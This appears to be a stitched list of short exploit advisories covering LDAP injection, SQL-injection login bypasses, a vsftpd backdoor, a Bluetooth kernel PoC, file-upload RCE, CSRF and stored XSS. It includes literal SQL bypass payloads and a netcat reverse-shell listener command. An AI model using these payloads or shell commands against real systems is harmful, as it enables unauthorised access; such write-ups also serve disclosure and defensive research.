To exploit this flaw it is necessary to have at least one user/password previously registered, because the system checks (ldap bind) the first user returned in the ldap search. However, it returns the last user found in the search to the function that called it (logic error). So, I call this problem an LDAP injection in conjunction with a programming logic error that allows you to authenticate to CITSmart ITSM with another valid user without needing to know the target user's password.
I Found SQL Injection in 4 Page Login (Police Login page, Incharge Login page, User Login & HQ Login). The exploit is triggered by sending a maliciously crafted POST request to the vulnerable page with the payload 'email='or''='&password='or''='&s='. This payload allows the attacker to bypass authentication and gain access to the application.
ExpressVPN Router version 1 is vulnerable to integer overflow vulnerability in Nginx range filter module resulting into leak of potentially sensitive information triggered by specially crafted request.
An authentication bypass vulnerability exists in Blitar Tourism 1.0. An attacker can exploit this vulnerability by sending a crafted HTTP POST request with malicious SQL injection payloads in the username parameter. This can allow an attacker to bypass authentication and gain access to the application.
A SQL injection vulnerability exists in Simple Student Information System 1.0, which allows an attacker to bypass authentication by entering 'or''=' as the username and password. This can be done by sending a POST request with the payload 'username='or''='&password='or''='&login=Log+In' to the index.php page.
A vulnerability in vsftpd 2.3.4 allows an attacker to gain remote code execution by sending a specially crafted USER command to the FTP server. This can be exploited by sending a USER command with a specially crafted argument to the FTP server, which will then execute arbitrary commands with root privileges.
This Proof-Of-Concept demonstrates the exploitation of CVE-2020-12351 and CVE-2020-12352. Compile using gcc -o exploit exploit.c -lbluetooth and execute as sudo ./exploit target_mac source_ip source_port. In another terminal, run nc -lvp 1337 exec bash -i 2>&0 1>&0. If successful, a calc can be spawned with export XAUTHORITY=/run/user/1000/gdm/Xauthority export DISPLAY=:0 gnome-calculator. This Proof-Of-Concept has been tested against a Dell XPS 15 running Ubuntu 20.04.1 LTS with 5.4.0-48-generic #52-Ubuntu SMP Thu Sep 10 10:58:49 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux. The success rate of the exploit is estimated at 80%.
A RCE on Composr CMS has been discovered by BugsBD Private LTD. We have a galleries security issue which allows us to upload a PHP file. Whenever we upload an image from galleries, Composr allows us to upload only images. If we tried to upload a PHP file from galleries uploader it will say someone attempting hacking activities. But we have a security issue on the Upload In Bulk section. Whenever we check allowed extension in Upload in bulk function we can see PHP is completely prohibited. But whenever we tamper the request and change the extension we can see it will upload the PHP file without other or server side verification. This allows a user to upload malicious file even when they restricted it.
DMA Radius Manager 4.4.0 is vulnerable to Cross-Site Request Forgery (CSRF). An attacker can craft a malicious HTML page that contains a form with malicious parameters and submit it to the vulnerable application. This can be used to create a new user with administrative privileges. This vulnerability is tracked as CVE-2021-30147.
The CMSimple 5.2 allow stored XSS via the Settings > CMS > Filebrowser > 'External:' input field. The CMSimple cms 'Filebrowser' 'External:' input field not filter special chars. It is possible to place JavaScript code. The JavaScript code placed here is executed by clicking on the Page or Files tab.
Services By CQR